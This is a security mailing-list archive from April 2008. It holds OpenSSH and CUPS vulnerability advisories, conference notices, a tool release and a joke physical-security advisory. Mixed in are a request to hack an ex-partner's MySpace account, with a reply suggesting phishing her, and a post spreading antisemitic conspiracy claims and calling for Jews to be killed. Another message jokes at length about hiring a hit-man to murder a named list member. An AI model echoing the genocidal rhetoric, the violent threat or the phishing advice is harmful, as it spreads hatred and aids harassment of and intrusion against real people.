_________________________________________________________________ Pack up or back up - use SkyDrive to transfer files or keep extra copies. Learn how. http://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_packup_042008 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/0be6d132/attachment.html From mastahflank at gmail.com Tue Apr 1 20:50:36 2008 From: mastahflank at gmail.com (josh) Date: Tue, 1 Apr 2008 19:50:36 +0000 Subject: [Full-disclosure] (no subject) In-Reply-To: References: Message-ID: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry> Can you sue for slander? And probably a simple phishing technique would work against her. Sent from my BlackBerry® smartphone with SprintSpeed -----Original Message----- From: Cody Roby Date: Tue, 1 Apr 2008 15:31:38 To: Subject: [Full-disclosure] (no subject) Alright, I have a crazy ex who keeps posting malicious things about me on her MySpace and I would like to know how to use HTML errors to hack her MySpace. I saw a previous post, but the code has been removed. Please help. ---------------- Pack up or back up - use SkyDrive to transfer files or keep extra copies. Learn how. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From groffg at gmgdesign.com Tue Apr 1 21:05:38 2008 From: groffg at gmgdesign.com (Garrett M. Groff) Date: Tue, 1 Apr 2008 16:05:38 -0400 Subject: [Full-disclosure] (no subject) References: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry> Message-ID: <00b601c89433$c334cec0$336b880a@softpro.corp> Another approach is that you could stop reading her blog and seek an alternate pastime(s).
That would avoid the commission of computer crime and its possible ramifications. - G ----- Original Message ----- From: "josh" To: "Cody Roby" ; ; Sent: Tuesday, April 01, 2008 3:50 PM Subject: Re: [Full-disclosure] (no subject) Can you sue for slander? And probably a simple phishing technique would work against her. Sent from my BlackBerry® smartphone with SprintSpeed -----Original Message----- From: Cody Roby Date: Tue, 1 Apr 2008 15:31:38 To: Subject: [Full-disclosure] (no subject) Alright, I have a crazy ex who keeps posting malicious things about me on her MySpace and I would like to know how to use HTML errors to hack her MySpace. I saw a previous post, but the code has been removed. Please help. ---------------- Pack up or back up - use SkyDrive to transfer files or keep extra copies. Learn how. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From xploitable at gmail.com Tue Apr 1 21:59:43 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 1 Apr 2008 21:59:43 +0100 Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public In-Reply-To: <20605.1206932416@turing-police.cc.vt.edu> References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com> <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu> Message-ID: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com> On Mon, Mar 31, 2008 at 4:00 AM, wrote: > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said: > > > Why are they announcing podcasts when both Joel Esler and Johannes > > Ullrich have a privacy breach still to publicly acknowledge and > > apologize for? > > Umm.. maybe because, despite what you may think, your little pissing contest > with Joel and Johannes doesn't qualify as an "oh my ghod, let's drop *everything* > and shut down the entire workflow and not do a single damned thing until this > issue is resolved". They aren't busy or getting on with business, they have obviously snubbed the n3td3v agenda. Joel Esler is back on duty, http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been sacked and he is talking about April Fools' Day.
I'm mighty angry, n3td3v From gluttony at gmail.com Wed Apr 2 00:21:55 2008 From: gluttony at gmail.com (Andrew A) Date: Tue, 1 Apr 2008 16:21:55 -0700 Subject: [Full-disclosure] Greedy Jews fact of the day Message-ID: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> "And it shall be, when the LORD thy God shall bring thee into the land which He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give thee--great and goodly cities, which thou didst not build, and houses full of all good things, which thou didst not fill, and cisterns hewn out, which thou didst not hew, vineyards and olive-trees, which thou didst not plant, and thou shalt eat and be satisfied." These verses from Deuteronomy chapter 6 are written on a piece of parchment and placed in a box which is hung outside the house of every Jew that keeps the covenant. And so they have accomplished, in the United States of America. The subprime crises and resulting bailouts (at our expense by our national reserve bank, which is headed by an Orthodox Jew serving a board of Orthodox Jews) are going to create thousands of empty homes and plots of arable land owned by investment banking institutions that are owned exclusively by Orthodox Jews. Why should we leave a single follower of such a filthy, greedy religion alive? Do any of you have an idea? I pray to you, the Lord my God, to help me destroy the Jewish meme. Every single follower of this arrogant and horrible idea should have their gold exchanged for flying pieces of lead and steel. Let the Jews take what they have reaped and sown-- death, destruction and hatred. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/fe4e5925/attachment.html From groffg at gmgdesign.com Tue Apr 1 15:44:27 2008 From: groffg at gmgdesign.com (Garrett M. 
Groff) Date: Tue, 1 Apr 2008 10:44:27 -0400 Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition References: <1207026022.3142.287.camel@localhost><997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com> Message-ID: <002901c89406$e3c5e110$336b880a@softpro.corp> Although, in all seriousness, I can imagine "physical world" things being compromised, possibly via software attacks alone (or, equally likely, a single disgruntled employee). Allow me to explain using a particular example: safes. Companies that make safes (be they old-fashioned mechanical or electronic) often have records of their combinations corresponding to a unique serial number for each safe. Yes, they have an electronic database of all the combinations for all their safes. In the case of electronic safes, this combination is often unchangeable; the user of the safe can use that factory default code initially to create a "user combination" that can open the safe, but can later be changed (if you wish to disallow that user access later on). Anyway, the factory default combination can't be changed and is in a database somewhere. This presents a convenience on the part of the business that produces the safes (avoids angry customers who are locked out of their safes) but reduces security for all users of that company's products. I understand the business case for keeping records of all combinations for all safes, but the downside is security in the event that that list/database is ever leaked. - G ----- Original Message ----- From: evilrabbi To: Nate McFeters Cc: full-disclosure at lists.grok.org.uk ; bugtraq at securityfocus.com Sent: Tuesday, April 01, 2008 9:58 AM Subject: Re: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition Why would you release something like this without telling the vendor? What you did is irresponsible. On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters wrote: Hahaha, nice find.
On 4/1/08, I)ruid wrote: ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Security Advisory ===============/======================================================== Advisory ID: CAU-2008-0001 Release Date: 04/01/2008 Title: Slowly Closing Door Race Condition Application/OS: Physical Structures Topic: Physical structures employing exit doors with locks are vulnerable to a race condition. Vendor Status: Not Notified Attributes: Physical, Race Condition Advisory URL: http://www.caughq.org/advisories/CAU-2008-0001.txt Author/Email: CAU ===============/======================================================== Overview ======== Physical structures which employ automatically locking doors to secure exit points expose a race condition which may allow unauthorized entry. Impact ====== Malicious outsiders may be able to enter a structure via an exit point. Exit points may additionally provide an exit from a secure area of the structure, allowing an outsider entering through the exit point to gain direct access to the secure area. Affected Systems ================ Physical structures which employ automatically locking doors at exit points of the structure. Technical Explanation ===================== An exit's lock[1] generally converts a two-way door into a one-way door, allowing a person to traverse the door's threshold in one direction but not in the other. These types of locks are used to secure exit points of structures so that people may exit via the door but not re-enter without disabling the lock through force or authentication. When a person exits the structure through an exit point which is secured by such a mechanism, a race condition exists wherein a malicious outsider may be able to reach the door and enter through it before it closes and locks itself. 
Many doors, especially heavier ones, also employ closing mechanisms[2] which are designed to cause the door to close slowly so as not to slam the door shut and damage the door frame, or damage any human appendage which may be in between the door and its frame. Such closing mechanisms can greatly increase the amount of time that the race condition exists. Solution & Recommendations ========================== 1) Always ensure that personnel exiting an exit door wait outside the door until it has completely closed and locked before walking away. 2) Employ a double door system such as is used in an air-lock where the interior door must be secured prior to the exterior door being allowed to open. Exploitation ============ First identify the exit point that you want to exploit. Stand at a safe distance during a high-traffic time and watch for people to use the exit point. Time how long it takes for the door to close and lock itself when someone traverses the exit point. Next, identify a safe hiding place near the exit point, preferably in a direction that would be behind a person exiting the door, but which is within a distance to the exit point which you could traverse in under the door's closing time at a brisk pace or run. Finally, hide in this location during a lower traffic time and wait for someone to utilize the exit point. After they have exited the door and are walking away, run to the door and enter before it has closed and locked. Extra points are awarded for a spectacular dive and/or roll to catch the door at the very last second. References ========== [1] http://en.wikipedia.org/wiki/Lock_%28device%29 [2] http://en.wikipedia.org/wiki/Door_closer Credits & Gr33ts ================ Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214 -- I)ruid, C²ISSP druid at caughq.org http://druid.caughq.org _______________________________________________ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- h0 h0 h0 -- www.nopsled.net ------------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/f0328583/attachment.html From Valdis.Kletnieks at vt.edu Wed Apr 2 01:06:17 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 01 Apr 2008 20:06:17 -0400 Subject: [Full-disclosure] Greedy Jews fact of the day In-Reply-To: Your message of "Tue, 01 Apr 2008 16:21:55 PDT." <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> Message-ID: <29471.1207094777@turing-police.cc.vt.edu> On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said: > Why should we leave a single follower of such a filthy, greedy religion > alive? Do any of you have an idea? You're just sore because they thought of the meme "All the riches rightfully belong to those of our religion" before your religion did... -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/42452034/attachment.bin

From erey at ernw.de Wed Apr 2 01:20:11 2008
From: erey at ernw.de (Enno Rey)
Date: Wed, 2 Apr 2008 02:20:11 +0200
Subject: [Full-disclosure] Troopers08 Security Conference, April 23/24 (Munich/Germany)
Message-ID: <20080402002011.GF2235@ws25.ernw.de>

Troopers08 Presentations
========================

Keynote on "Invulnerable Software" - Dan Bernstein
KIDS - Kernel Intrusion Detection System - Rodrigo Branco
State of Security - Andrew Cushman, Microsoft
Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass
Side Channel Analysis - Job de Haas, Riscure
Hackertools according to German law (§ 202c StGB) - Horst Speichert, Lawyer
Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security
Virtualization: There is no spoon - Michael Kemp
Straight Talk about Cryptography - Jon Callas, PGP
Evilgrade: You have pending upgrades - Francisco Amato
"Self defending networks" - hype or essential need for international organisations? - Rolf Strehle, VOITH AG
Keynote "Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It?" - Christopher Hoff, Unisys
GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft
Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense
A penetration testing learning kit - Ariel Waissbein, Core Security
Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College
Hacking Second Life(TM) - Michael Thumann, ERNW GmbH
Enterprise Webapplication Security Strategy at Allianz S.E., Dr. Johannes Raab, Allianz S.E.
Tapping $$$ Enterprises - Pierre Kroma
Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim
SCADA and National Critical Infrastructures: is security an "optional"? - Raoul Chiesa
Data Loss Protection - Hope or Hype? - Enno Rey & Angus Blitter

--
Additional Pre-Con Latenight Talks
Packet Wars Evening Fun
--

thanks,

Enno Rey

--
Enno Rey
Check out www.troopers08.org!
ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1
Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey

From tbiehn at gmail.com Wed Apr 2 01:28:57 2008
From: tbiehn at gmail.com (T Biehn)
Date: Tue, 1 Apr 2008 20:28:57 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>

Valdis,
Never took you for an anti-Semite.

On Tue, Apr 1, 2008 at 8:06 PM, wrote:
> On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>
> > Why should we leave a single follower of such a filthy, greedy religion
> > alive? Do any of you have an idea?
>
> You're just sore because they thought of the meme "All the riches rightfully
> belong to those of our religion" before your religion did...
From kurt.buff at gmail.com Wed Apr 2 01:36:58 2008
From: kurt.buff at gmail.com (Kurt Buff)
Date: Tue, 1 Apr 2008 17:36:58 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu> <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID:

And after that message, you still shouldn't. Parse it a bit more carefully...

On Tue, Apr 1, 2008 at 5:28 PM, T Biehn wrote:
> Valdis,
> Never took you for an anti-Semite.
>
> On Tue, Apr 1, 2008 at 8:06 PM, wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> >
> > > Why should we leave a single follower of such a filthy, greedy religion
> > > alive? Do any of you have an idea?
> >
> > You're just sore because they thought of the meme "All the riches rightfully
> > belong to those of our religion" before your religion did...
From prb at lava.net Wed Apr 2 01:47:07 2008
From: prb at lava.net (Peter Besenbruch)
Date: Tue, 1 Apr 2008 14:47:07 -1000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu> <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <200804011447.07910.prb@lava.net>

On Tuesday 01 April 2008 14:28:57 T Biehn wrote:
> Valdis,
> Never took you for an anti-Semite.

Maybe you haven't read enough of Valdis' posts. He knows a lot about
security, but often writes with tongue firmly planted in cheek. There
really isn't a better response to these kinds of rants.

> On Tue, Apr 1, 2008 at 8:06 PM, wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> > > Why should we leave a single follower of such a filthy, greedy
> > > religion alive? Do any of you have an idea?
> >
> > You're just sore because they thought of the meme "All the riches
> > rightfully belong to those of our religion" before your religion did...
--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From kees at ubuntu.com Wed Apr 2 01:46:52 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 1 Apr 2008 17:46:52 -0700
Subject: [Full-disclosure] [USN-597-1] OpenSSH vulnerability
Message-ID: <20080402004652.GQ8254@outflux.net>

===========================================================
Ubuntu Security Notice USN-597-1             April 01, 2008
openssh vulnerability
CVE-2008-1483
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssh-client                  1:4.2p1-7ubuntu3.3

Ubuntu 6.10:
  openssh-client                  1:4.3p2-5ubuntu1.2

Ubuntu 7.04:
  openssh-client                  1:4.3p2-8ubuntu1.2

Ubuntu 7.10:
  openssh-client                  1:4.6p1-5ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Timo Juhani Lindfors discovered that the OpenSSH client, when port
forwarding was requested, would listen on any available address family.
A local attacker could exploit this flaw on systems with IPv6 enabled to
hijack connections, including X11 forwards.
From infolookup at gmail.com Wed Apr 2 02:48:13 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Wed, 2 Apr 2008 01:48:13 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2112875235-1207100888-cardhu_decombobulator_blackberry.rim.net-959436740-@bxe139.bisx.prod.on.blackberry>

Both Jews and Gentiles that's what the word says.

Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: Valdis.Kletnieks at vt.edu
Date: Tue, 01 Apr 2008 20:06:17
To: Andrew A
Cc: Full Disclosure
Subject: Re: [Full-disclosure] Greedy Jews fact of the day

On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...
From winsoc at googlemail.com Tue Apr 1 22:03:50 2008
From: winsoc at googlemail.com (winsoc)
Date: Tue, 1 Apr 2008 22:03:50 +0100
Subject: [Full-disclosure] FW: [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities
Message-ID: <006101c8943b$e3d70500$ab850f00$@com>

Nice find though

-----Original Message-----
From: winsoc [mailto:winsoc at gmail.com]
Sent: 01 April 2008 22:03
To: 'Robert Buchholz'
Subject: RE: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities

Hey,

I'm curious as to why this service is available as default- especially on
Suse OS. I mean this is not M$ shit we're talking about, did someone oversee
this or what...

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Robert Buchholz
Sent: 01 April 2008 20:17
To: gentoo-announce at gentoo.org
Cc: full-disclosure at lists.grok.org.uk; bugtraq at securityfocus.com; security-alerts at linuxsecurity.com
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the
remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating
systems.
Affected packages
=================

    -------------------------------------------------------------------
     Package        /  Vulnerable  /                         Unaffected
    -------------------------------------------------------------------
  1  net-print/cups      < 1.2.12-r7                        >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the cgiCompileSearch()
  function used in several CGI scripts in CUPS' administration interface
  does not correctly calculate boundaries when processing a user-provided
  regular expression, leading to a heap-based buffer overflow
  (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the
  process_browse_data() function when adding or removing remote shared
  printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function uses
  the code_size value from GIF images without properly checking it,
  leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2
  filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print
jobs and possibly execute arbitrary code with the privileges of the user
running CUPS (usually lp), or cause a Denial of Service. The
vulnerabilities are exploitable via the network when CUPS is sharing
printers remotely.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From fizz at titania.co.uk Wed Apr 2 09:02:05 2008
From: fizz at titania.co.uk (Fizz)
Date: Wed, 2 Apr 2008 09:02:05 +0100
Subject: [Full-disclosure] Nipper update released
Message-ID: <200804020902.05233.fizz@titania.co.uk>

Nipper is a network infrastructure parser. It processes configuration
files from network devices and produces a report including a security
audit of the device, configuration settings and other relevant information.

Nipper currently supports the following device types:

  * Cisco IOS-based routers
  * Cisco IOS-based catalysts
  * Cisco NMP-based catalysts
  * Cisco CatOS-based catalysts
  * Cisco PIX-based Firewalls
  * Cisco ASA-based Firewalls
  * Cisco FWSM-based Firewalls
  * Cisco Content Service Switches
  * Juniper ScreenOS-based Firewalls (NetScreen)
  * Nortel Passport devices
  * CheckPoint Firewall-1 Firewalls
  * Sonicwall SonicOS-based Firewalls
  * Bay Networks Accelar
  * Nokia IP Firewalls

The security audit includes details of the findings, together with
detailed recommendations. The security audit can be modified using
command line parameters or an external configuration file.

This update (0.11.5) includes improvements to the report output; some
minor PQR issues have been resolved. It also includes bug fixes for
issues identified by the community.

Nipper is available for Linux, Windows and other platforms. More
information and downloads can be obtained from the project web site at
http://nipper.titania.co.uk

If you have access to device configuration files for network devices,
please consider sending them to me. I will be discreet, but you are
welcome to sanitise them first. However, if you do sanitise them, please
ensure that the structure of the config file is not modified.

The project web site is http://nipper.titania.co.uk

Ian Ventura-Whiting

From wh1t3h4t3 at yahoo.co.uk Wed Apr 2 11:02:47 2008
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Wed, 2 Apr 2008 11:02:47 +0100 (BST)
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
Message-ID: <639063.889.qm@web23315.mail.ird.yahoo.com>

Once upon a time in toy town, I offered to contract the services of a
professional hit-man to have n3td3v executed - in part a joke, my black
humour. However, I have received so many donations from various gmail.com
addresses that I have just been able to purchase my first car with the
left-over change.
As I type this from my Lamborghini Diablo parked up in a car park at
London's Heathrow eagerly awaiting the arrival of "Aghbad", a delightful
Eastern European chap with a pretty impressive handlebar mustache which
matches the colour of the AK-47 I believe has been paid to come off before
the concourse, I can't help but realize just HOW MANY of the SANS people
paid their donations to this worthwhile cause.

I also wonder if n3td3v thought the CIA would allow him to continue his
campaign of hate.

Maybe the FUD will stop and we can all get on with whatever we were doing
before the n3td3v agenda.

--- n3td3v wrote:
> On Mon, Mar 31, 2008 at 4:00 AM, wrote:
> > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
> >
> > > Why are they announcing podcasts when both Joel Esler and Johannes
> > > Ullrich have a privacy breach still to publically acknowledge and
> > > apologize for?
> >
> > Umm.. maybe because, despite what you may think, your little pissing contest
> > with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
> > and shut down the entire workflow and not do a single damned thing until this
> > issue is resolved".
>
> They aren't busy or getting on with business, they have obviously
> snubbed the n3td3v agenda.
>
> Joel Esler is back on duty,
> http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been
> sacked and he is talking about April Fools Day.
>
> I'm mighty angry,
>
> n3td3v

__________________________________________________________
Sent from Yahoo! Mail.
A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html

From jeff.stebelton at gmail.com Wed Apr 2 12:41:26 2008
From: jeff.stebelton at gmail.com (Jeff Stebelton)
Date: Wed, 02 Apr 2008 07:41:26 -0400
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com> <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu> <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
Message-ID: <47F370E6.50301@gmail.com>

Actually, they are getting on with their business, keeping thousands of
network security professionals informed and updated. What they aren't
doing is engaging in childish postings to listservs, silly braggadocio,
and generally making a fool of themselves. When you are good at what you
do, your work speaks for you, and you don't need to fill up people's
inboxes with rants and rambling calls for action from the White House
(that one split my side laughing). "In the President's Early Bird
briefings today is yet another serious cyberwarfare warning from that
accomplished and respected security researcher, n3td3v. Mark this Top
Priority and make sure he sees it first thing!". This is what you put up
with to have unmoderated lists.

n3td3v wrote:
> On Mon, Mar 31, 2008 at 4:00 AM, wrote:
>
>> On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
>>
>> > Why are they announcing podcasts when both Joel Esler and Johannes
>> > Ullrich have a privacy breach still to publically acknowledge and
>> > apologize for?
>>
>> Umm.. maybe because, despite what you may think, your little pissing contest
>> with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
>> and shut down the entire workflow and not do a single damned thing until this
>> issue is resolved".
>>
>
> They aren't busy or getting on with business, they have obviously
> snubbed the n3td3v agenda.
>
> Joel Esler is back on duty,
> http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been
> sacked and he is talking about April Fools Day.
>
> I'm mighty angry,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From cfp2008 at recon.cx Wed Apr 2 12:41:55 2008
From: cfp2008 at recon.cx (Recon Conference)
Date: Wed, 02 Apr 2008 07:41:55 -0400
Subject: [Full-disclosure] Recon 2008 CFP last call, early registration open
Message-ID: <47F37103.7020603@recon.cx>

+ + + + + + + + + \ / + _ - _+_ - ,__ _=. .:. /=\ _|===|_ ||::| | | _|. | | | | | | __===_ -=- ||::| |==| | | __ |.:.| /\| |:. | | | | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ; ' | ' : ` : ' . ' . . : ' .

R E C O N 2 0 0 8
http://recon.cx/2008/
june 13 to 15, 2008
montreal, quebec

+ The early registration for the conference is now open.

+ We are offering three training courses this year.
  -Advanced Reverse Engineering by Nicolas Brulez
  -Binary vulnerabilities and Exploit Writing by Gerardo 'gera' Richarte
  -Binary Literacy: Static Reverse Engineering by Rolf Rolles
  check http://recon.cx/2008/training.html for more details

+ There is one month left before the end of the call for papers
  check http://recon.cx/2008/recon2008-cfp.txt for details

ATH0++ N0 C4RR13R

From thecmac at gmail.com Wed Apr 2 11:23:07 2008
From: thecmac at gmail.com (Cassidy MacFarlane)
Date: Wed, 2 Apr 2008 11:23:07 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
Message-ID:

"You're playing with fire.
Fire that cannot be put out with words but only inflame the situation of which you are misinformed." - n3td3v

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Micheal Turner
Sent: 02 April 2008 11:03
To: n3td3v; Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] sans handler gives out n3td3v e-mail to public

